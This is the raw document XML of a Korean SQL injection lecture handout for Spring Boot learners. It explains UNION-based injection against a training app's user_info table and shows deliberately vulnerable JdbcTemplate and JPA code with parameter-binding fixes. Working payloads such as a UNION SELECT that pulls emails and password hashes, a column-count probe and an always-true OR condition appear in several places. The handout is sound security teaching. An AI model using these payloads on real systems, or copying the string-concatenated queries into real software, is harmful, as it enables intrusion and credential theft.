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55A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:before="1200" w:after="2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1D355A" w:rsidRDefault="00351BBC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>제1강. SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Boot / Thymeleaf / JPA 환경 기반</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t>대상 : Spring Boot(세션+JWT) 학습자</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t>실습 프로젝트 : Student_JWT (feature/sqli-demo)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p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1. SQL Injection 개념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2. SQL 기초와 UNION 문법 (이 앱의 테이블 기준)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3. 공격 원리 : 입력이 SQL 구문이 되는 과정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4. UNION 기반 인젝션 이해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5. 취약 코드 구현 (JdbcTemplate / JPA)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6. 안전 코드 : 파라미터 바인딩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7. 실습 : 단계별 공격 재현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8. 방어 대책 정리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9. 핵심 요약</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p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SQL Injection 개념</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SQL Injection(SQL 삽입)은 공격자가 입력값에 SQL 구문의 일부를 끼워 넣어, 애플리케이션이 의도하지 않은 데이터베이스 명령을 실행하게 만드는 공격이다. OWASP Top 10에서 오랫동안 상위를 차지해 온 대표적인 웹 취약점이다. 이 장은 보안을 처음 접하는 사람도 이해할 수 있도록 기초부터 설명한다.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먼저, 데이터베이스와 SQL이란?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>웹 애플리케이션은 회원 정보, 게시글, 주문 내역 같은 데이터를 "데이터베이스(DB)"에 저장한다. DB 안의 데이터는 엑셀처럼 "테이블(표)" 형태로 관리된다. 이 테이블의 데이터를 조회·추가·수정·삭제할 때 사용하는 언어가 "SQL(Structured Query Language)"이다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>예를 들어 "students 테이블에서 이름이 Alice인 학생을 찾아줘"를 SQL로 쓰면 다음과 같다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BB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* FROM students WHERE name = 'Alice';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웹에서 SQL이 실행되는 과정</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>사용자가 검색창에 값을 입력하면 그 값은 다음 흐름을 거쳐 DB까지 전달된다.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[1] 사용자 입력      (예: 검색어 "Alice")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[2] 서버가 입력을 넣어 SQL 문장을 조립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SELECT ... FROM students WHERE name LIKE '%Alice%'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[3] DB가 SQL을 실행하고 결과를 반환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[4] 서버가 결과를 화면(응답)으로 전달</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">문제는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>[2]단계</w:t>
      </w:r>
      <w:r>
        <w:t>다. 서버가 사용자 입력을 SQL 문장에 그대로 끼워 넣으면, 공격자는 입력에 SQL 구문을 몰래 섞어 보내 DB를 자기 마음대로 조종할 수 있다.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한 줄로 이해하는 핵심</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">핵심 원인은 한 문장으로 요약된다 : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>사용자 입력을 "데이터(값)"가 아니라 "쿼리 구문(명령)"으로 취급하기 때문</w:t>
      </w:r>
      <w:r>
        <w:t>이다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>비유하자면, 빈칸을 채우는 신청서의 "이름" 칸에 이름 대신 "홍길동. 그리고 모든 회원의 비밀번호를 보여줘"라고 적었더니, 담당 직원이 그 문장을 곧이곧대로 실행해 버리는 것과 같다. 입력을 "이름 값"으로만 봤어야 하는데 "명령"으로 실행한 것이 문제의 본질이다.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공격 유형 (참고)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SQL 인젝션은 결과를 확인하는 방식에 따라 크게 세 가지로 나뉜다. 이 교안은 가장 직관적인 UNION 기반을 다룬다.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00"/>
      </w:tblGrid>
      <w:tr w:rsidR="001D355A">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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유형</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="63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D355A"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sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>UNION 기반 (In-band)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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응답 화면에 탈취한 데이터를 직접 실어 보는 방식. 이 교안의 주제.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D355A"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오류 기반 (Error-based)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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DB 오류 메시지에 정보를 노출시켜 알아내는 방식.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D355A"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lastRenderedPageBreak/>
              <w:t>블라인드 (Blind)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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응답에 데이터가 안 보일 때, 참/거짓 반응이나 응답 시간 차이로 한 글자씩 추론하는 방식.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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무엇이 위험한가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인증 우회 : 로그인 조건을 항상 참으로 만들어 비밀번호 없이 로그인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정보 유출 : 다른 테이블의 계정 정보, 비밀번호 해시, 개인정보 탈취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데이터 위변조/삭제 : UPDATE, DELETE, DROP 등 실행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DB 구조 탐색 : information_schema를 통해 전체 스키마 파악</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">주의 : </w:t>
      </w:r>
      <w:r>
        <w:t>이 교안의 모든 공격 실습은 격리된 교육용 환경(로컬 Docker/DB, 교육용 취약 엔드포인트)에서만 수행한다. 실제 서비스나 타인의 시스템을 대상으로 하는 것은 불법이다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p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lastRenderedPageBreak/>
        <w:t xml:space="preserve">2. SQL 기초와 UNION 문법 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>공격을 이해하려면 최소한의 SQL 문법이 필요하다. 여기서는 실습 앱(Student_JWT)의 실제 테이블을 기준으로 설명한다.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실습 앱의 테이블 구조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400"/>
      </w:tblGrid>
      <w:tr w:rsidR="001D355A">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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테이블</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="43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주요 컬럼</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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D355A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sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>students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student_id, name, student_number, department_id, user_info_id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학생 기본 정보</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D355A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sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>departments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department_id, name, code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학과 정보</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D355A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sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>student_details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student_detail_id, address, phone_number, email, date_of_birth, student_id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학생 상세(연락처)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D355A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C00000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>user_info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C00000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>id, name, email, password, roles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C00000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>로그인 계정 (표적)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">공격의 최종 표적은 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>user_info</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 테이블이다. 로그인 계정의 이메일과 비밀번호 해시(password)가 들어 있기 때문이다.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SELECT : 데이터 조회의 기본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-- students 테이블에서 3개 컬럼을 조회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student_id, name, student_number FROM students;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-- 이름에 'Alice'가 포함된 학생만 조회 (LIKE = 부분 일치)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student_id, name, student_number FROM students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WHERE name LIKE '%Alice%';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SELECT 뒤에는 조회할 컬럼을, FROM 뒤에는 테이블을, WHERE 뒤에는 조건을 쓴다. LIKE '%...%'는 부분 일치 검색이며, 이 앱의 학생 검색 기능이 바로 이 방식을 사용한다.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UNION : 두 조회 결과를 세로로 합치기</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>UNION은 서로 다른 두 SELECT의 결과를 위아래로 이어 붙인다. 바로 이 기능이 SQL 인젝션에서 "원래 조회 대상과 전혀 다른 테이블"의 데이터를 함께 빼내는 데 악용된다.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-- students의 조회 결과 아래에 departments의 결과를 이어 붙인다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student_id, name, student_number FROM students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UNION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department_id, name, code FROM departments;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>UNION은 중복 행을 제거하고, UNION ALL은 중복까지 모두 보여준다. (공격 시에는 결과 누락을 막기 위해 UNION ALL을 쓰기도 한다.)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UNION의 두 가지 규칙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규칙 1 — 컬럼 개수가 같아야 한다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 위 예처럼 양쪽 SELECT가 모두 3개 컬럼이어야 UNION이 성립한다. 개수가 다르면 오류가 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규칙 2 — 각 컬럼의 데이터 타입이 호환되어야 한다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 문자열 자리에는 문자열을 맞추면 무난하다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>또한 결과에 표시되는 컬럼 이름은 첫 번째 SELECT를 따른다. 그래서 뒤 SELECT의 email 값이 앞 SELECT의 name 컬럼 자리에 표시될 수 있다. 이것이 공격에서 계정 정보가 "학생 이름" 칸에 섞여 나오는 이유다.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컬럼 수 맞추기 : 임의값(숫자)으로 채우기</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>빼내려는 테이블의 컬럼 수가 원래 쿼리와 다르면, 숫자나 NULL로 빈자리를 채워 개수를 맞춘다.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-- user_info에서 email, password 2개만 필요하지만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-- 원래 쿼리가 3개 컬럼이므로 숫자 1로 한 칸을 채워 3개로 맞춘다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student_id, name, student_number FROM students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UNION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1, email, password FROM user_info;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">이 문법이 다음 장에서 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>공격 페이로드로 그대로</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 쓰인다. UNION 문법 자체는 정상 SQL 기능이지만, 취약한 코드를 만나면 공격 도구가 된다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p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lastRenderedPageBreak/>
        <w:t>3. 공격 원리 : 입력이 SQL 구문이 되는 과정</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>아래 취약 코드는 사용자 입력 name을 SQL 문자열에 그대로 이어 붙인다.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String sql = "SELECT student_id, name, student_number FROM students "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+ "WHERE name LIKE '%" + name + "%'";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">정상 입력 </w:t>
      </w:r>
      <w:r>
        <w:t>(name = Alice)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student_id, name, student_number FROM students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WHERE name LIKE '%Alice%'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">공격 입력 </w:t>
      </w:r>
      <w:r>
        <w:t>(name = %' UNION SELECT id, email, password FROM user_info #)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SELECT student_id, name, student_number FROM students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WHERE name LIKE '%%' UNION SELECT id, email, password FROM user_info #%'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">입력에 들어간 작은따옴표(') 가 문자열을 닫고, 그 뒤 UNION SELECT 가 새로운 쿼리 구문이 된다. 끝의 # 는 뒤에 남는 문자를 주석 처리해 구문 오류를 막는다. 결국 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>공격자의 입력이 SQL의 일부로 실행</w:t>
      </w:r>
      <w:r>
        <w:t>되는 것이 인젝션의 본질이다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">중요 : </w:t>
      </w:r>
      <w:r>
        <w:t>공격자는 서버 코드를 직접 실행하는 것이 아니라 "입력값" 하나만 조작한다. 그 입력을 SQL로 만들어 버리는 것은 취약한 서버 코드다.</w:t>
      </w:r>
    </w:p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t>4. UNION 기반 인젝션 이해</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>UNION은 두 SELECT 결과를 세로로 합친다. 이를 악용하면 원래 조회 대상(students)과 전혀 다른 테이블(user_info)의 데이터를 같은 응답에 실어 나를 수 있다. 성립 조건은 두 가지다.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컬럼 수가 같아야 한다</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 원본 SELECT가 3개 컬럼이면 UNION 뒤도 3개여야 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데이터 타입이 호환되어야 한다</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 문자열 자리에 문자열을 맞추면 무난하다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>그래서 공격자는 보통 다음 순서로 진행한다.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컬럼 수 확인 : %' UNION SELECT 1,2,3 #  (숫자 행이 나오면 컬럼 수가 맞은 것)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DB 구조 탐색 : information_schema.tables / columns 조회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데이터 탈취 : UNION SELECT 로 실제 테이블 값 조회</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p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lastRenderedPageBreak/>
        <w:t>5. 취약 코드 구현 (JdbcTemplate / JPA)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">실습 프로젝트에서는 취약 코드를 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>com.basic.myspringboot.vuln.sqli</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 패키지와 /api/vuln/sqli/** 경로로 격리했다. 기존 정상 검색 기능은 안전하게 유지된다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5496"/>
        </w:rPr>
        <w:t>5-1. JdbcTemplate 취약 코드</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SqlInjectionDemoService.searchVulnerable() — 입력을 문자열로 결합한다.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[취약] 입력이 SQL 구문의 일부가 된다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public List&lt;Map&lt;String, Object&gt;&gt; searchVulnerable(String name) {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String sql = "SELECT student_id, name, student_number FROM students "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+ "WHERE name LIKE '%" + name + "%'";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return jdbcTemplate.queryForList(sql);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1D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5496"/>
        </w:rPr>
        <w:t>5-2. JPA 네이티브 쿼리 취약 코드</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">흔한 오해 : </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">"우리는 JPA를 쓰니 SQL 인젝션은 없다." 하지만 JPA라도 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>문자열을 결합하면 동일하게 뚫린다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>JpaSqlInjectionDemoService.searchVulnerable() — EntityManager 네이티브 쿼리 + 문자열 결합.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[취약] JPA 인데도 문자열을 결합하면 동일하게 뚫린다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String sql = "SELECT student_id, name, student_number FROM students "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+ "WHERE name LIKE '%" + name + "%'";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Query query = entityManager.createNativeQuery(sql);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return query.getResultList();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">결론 : </w:t>
      </w:r>
      <w:r>
        <w:t>취약/안전을 가르는 것은 도구(JPA vs JdbcTemplate)가 아니라 "문자열 결합 vs 파라미터 바인딩" 이라는 코딩 방식이다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="001D355A">
      <w:pPr>
        <w:spacing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50"/>
        <w:gridCol w:w="3050"/>
      </w:tblGrid>
      <w:tr w:rsidR="001D355A">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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도구</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="305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문자열 결합</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="305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파라미터 바인딩</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D355A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JdbcTemplate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C00000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>[취약] students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[안전] students-safe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D355A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JPA 네이티브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C00000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>[취약] students-jpa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[안전] students-jpa-safe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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t>6. 안전 코드 : 파라미터 바인딩</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>쿼리 구조는 고정하고, 사용자 입력은 자리표시자(? 또는 :name)에 "값"으로만 전달한다. 입력에 따옴표나 UNION이 들어와도 검색 문자열로만 취급되어 인젝션이 성립하지 않는다.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JdbcTemplate (? 바인딩)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[안전]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String sql = "SELECT student_id, name, student_number FROM students WHERE name LIKE ?";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return jdbcTemplate.queryForList(sql, "%" + name + "%");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D1CE9" w:rsidRDefault="001D1CE9">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="180" w:after="90"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5496"/>
        </w:rPr>
      </w:pP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lastRenderedPageBreak/>
        <w:t>JPA 네이티브 (명명 파라미터 바인딩)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[안전]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String sql = "SELECT student_id, name, student_number FROM students WHERE name LIKE :name";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entityManager.createNativeQuery(sql)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.setParameter("name", "%" + name + "%")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.getResultList();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">참고 : </w:t>
      </w:r>
      <w:r>
        <w:t>이 프로젝트의 실제 검색 기능(StudentSearchService, StudentRepository)은 JPQL 명명 파라미터 바인딩을 사용하므로 안전하다. 취약점은 교육용으로 별도 추가한 것이다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRPr="001D1CE9" w:rsidRDefault="00351BBC" w:rsidP="001D1CE9">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="320" w:after="160"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t>7. 실습 : 단계별 공격 재현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실습 엔드포인트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400"/>
      </w:tblGrid>
      <w:tr w:rsidR="001D355A">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="46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44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</w:tr>
      <w:tr w:rsidR="001D355A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C00000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>[취약] JdbcTemplate 검색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/api/vuln/sqli/students?name=Alice</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D355A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[안전] JdbcTemplate 검색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/api/vuln/sqli/students-safe?name=Alice</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D355A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실행 SQL 확인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/api/vuln/sqli/students/debug?name=...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D355A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C00000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>[취약] JPA 네이티브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/api/vuln/sqli/students-jpa?name=Alice</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D355A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[안전] JPA 네이티브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/api/vuln/sqli/students-jpa-safe?name=Alice</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="001D355A" w:rsidRDefault="001D355A">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pP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단계 1. 정상 동작 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BB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GET /api/vuln/sqli/students?name=Alice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>→ 이름에 Alice가 포함된 학생만 조회된다.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단계 2. 항상 참(OR) 인젝션 — 전체 유출</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BB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name = %' OR '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D355A" w:rsidRDefault="00351BBC">
      <w:pPr>
        <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
